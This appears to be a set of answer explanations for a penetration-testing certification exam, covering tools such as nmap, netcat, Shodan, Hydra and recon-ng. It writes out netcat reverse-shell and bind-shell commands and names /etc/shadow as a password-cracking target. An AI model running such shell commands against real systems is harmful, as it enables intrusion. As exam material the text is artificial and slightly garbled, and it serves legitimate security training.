Common Product Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.

The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network

Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity

The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. SonarQube is a static, not dynamic, software testing tool, and OLLYDBG is a debugger.

The series of thousands of requests incrementing a variable indicate that the attacker was most likely attempting to exploit an insecure direct object reference vulnerability.

An attestation of findings is a certification provided by the penetration testers to document that they conducted a test and the results for compliance purposes.

Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.

Meterpreter is a memory resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory resident Meterpreter process. Roberto can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.

Most modern SNMP deployments use a non-default community string. If Sami does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you’re likely thinking of SMTP. Having an SNMP private string set will not stop Sami’s query if he has the proper community string, but not having the right community string will!

An external resource or API that may be installed in Maltego to expand its capabilities is called a transform. Other options are incorrect. Although related definitionally, the terms “shift,” “modifier,” and “tweak” are not relevant to Maltego

In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks

Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments: -l: Specifies listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Be verbose, printing out messages on standard error, such as when a connection occurs

Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security. ? Monitoring: Packet capture and export of data to text files for further processing by third-party tools. ? Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection. ? Testing: Checking Wi-Fi cards and driver capabilities. ? Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).

White box tests, sometimes called crystal box or full knowledge tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.

A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find.

Vulnerabilities with a CVSSv2 score higher than 6.0 but less than 10.0 fall into the High risk category

Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes

Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

There are a variety of tools that assist with this OSINT collection: ? Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. ? Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. ? Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. ? Nslookup tools help identify the IP addresses associated with an organization. ? Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. ? Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. ? the Harvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about organization ? Whois tools gather information from public records about ownership

The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Pixie dust attacks use brute force to identify the key for vulnerable WPS-enabled routers due to poor key selection practices. The other options are made up!

Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port] Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.

Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the Web.

Sami can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn’t useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials.

The OSINT Framework is a static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process and can greatly aid penetration testers in the data mining process. Other options are incorrect, because Maltego is an OSINT collection application that is known for its ability to build and illustrate connections between various data point, also because Shodan and Censys are Internet of Things (IoT) search engines that excel at finding open services on the Internet. It is also worth noting that as search engines, definitionally neither Shodan nor Censys can be static pages.

Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for

The Strings command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for useful information with a single quick command-line tool. Netcat, while often called a pen-tester’s Swiss Army knife, isn’t useful for this type of analysis. Eclipse is an IDE and would be useful for editing code or for managing a full decompiler in some cases

The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization’s defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.

The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.

On most Linux systems, the /etc/passwd file will contain a list of users as well as their home directories. Capturing both /etc/passwd and /etc/shadow are important for password cracking, making both desirable targets for penetration testers.

Sami has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Sami has gained access to SSmith’s user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it.

Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them

Sami can safely assume that almost any modern Linux system will have SSH, making SSH tunneling a legitimate option. If he connects outbound from the compromised system to his and creates a tunnel allowing traffic in, he can use his own vulnerability scanner through the tunnel to access the remote systems.

The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics

The organization that Dima is testing has likely deployed network access control, or NAC. Her system will not have the proper NAC client installed, and she will be unable to access that network jack without authenticating and having her system approved by the NAC system.

Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.

Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.

Patator, Hydra, and Medusa are all useful brute-forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!

The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker

Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

The PCI DSS standard is an industry standard for compliance for credit card processing organizations. Thus, Sami is conducting a compliance-based assessment.

Sami’s attack achieved the goal of denial by shutting down the web server and preventing legitimate users from accessing it.

Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.

Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.

JTAG debugging ports can provide greater visibility into tightly integrated hardware and software solutions, including the ability to access memory directly. This can provide access to encryption keys, passwords, or other capabilities that would otherwise be difficult for penetration testers to access. JTAG access is at a firmware level, rather than as a logged-in user, and does not provide remote access or logging.

In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@ [\]^_’{|}~. This will make it harder for attackers to break into your client’s system.

Exiftool is designed to pull metadata from images and other files. Grep may be useful to search for specific text in a file, but won’t pull the range of possible metadata from the file. PsTools is a Windows Sysinternals package that includes a variety of process-oriented tools. Nginx is a web server, load balancer, and multipurpose application services stack.

The command show modules will list all available modules for use in recon-ng. Other options are incorrect because the command show workspaces will output a list of all workspaces that have been added to the recon-ng database. Use modules is incorrect because the command use modules will return an error since there is no module named “modules.” Set modiles is incorrect because set modules will display usage guidelines for the “set” command, along with a list of module options that may be configured.

After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.

The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Because this is a black box scan, Sami should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.

Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offlineonly attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.

Sami is conducting static code analysis by reviewing the source code. Dynamic code analysis requires running the program, and both mutation testing and fuzzing are types of dynamic analysis.

Search and filter terms in Shodan must be provided in the format search_string filter:value. In the example given, FTP port:14147 will search for FTP connections available on the open Internet and then filter all but those running on port 14147 from the search results. Other options are incorrect because search and filter terms in Shodan must be provided in the format search_string filter:value.

Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.

The Local Administrator Password Solution (LAPS) from Microsoft provides a method for randomizing local administrator account credentials through integration with Active Directory

CompTIA highlights three important post-engagement cleanup activities: ? Removing any shells installed on systems during the penetration test ? Removing any tester-created accounts, credentials, or backdoors that were installed during testing ? Removing any tools that were installed during testing Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

Dima may want to try a brute-force dictionary attack to test for weak passwords. She should build a custom dictionary for her target organization, and she may want to do some social engineering work or social media assessment up front to help her identify any common password selection behaviors that members of the organization tend to display.

FOCA is a free, GNU-licensed tool that gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names. Note that while FOCA can be run in Linux and Unix variants using WINE (a compatibility layer or interface that allows Windows applications to run on *nix operating systems), the question specifically mentions that the tool was written for Windows, rather than stating that it only runs in Windows. Other options are incorrect. Because while Maltego and recon-ng are capable of scraping metadata from files with the use of transforms or modules, neither of these tools was written specifically for the Windows operating system family. Theharvester is incorrect because theharvester is limited to what can be pulled directly from a website; scraping the contents of files stored on a website is beyond its capabilities. In addition, theharvester is like Maltego and recon-ng in that it was not written specifically for the Windows operating system.

The -T flag in Nmap is used to set scan timing. Timing settings range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.

VRFY verifies that an address exists, while EXPN asks for the membership of a mailing list. Both may be used to validate user IDs.

Although theharvester can query many data sources, Facebook is not one of them, which makes C the correct answer. Pay careful attention to questions that are stated with a negating term such as “is not” or “are not.” Other options are incorrect. Google, LinkedIn, and Twitter are all valid data sources for theharvester, making these incorrect choices for this question.

A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goalsbased or objective-based assessments are usually designed to assess the overall security of an organization.

The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors’ offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions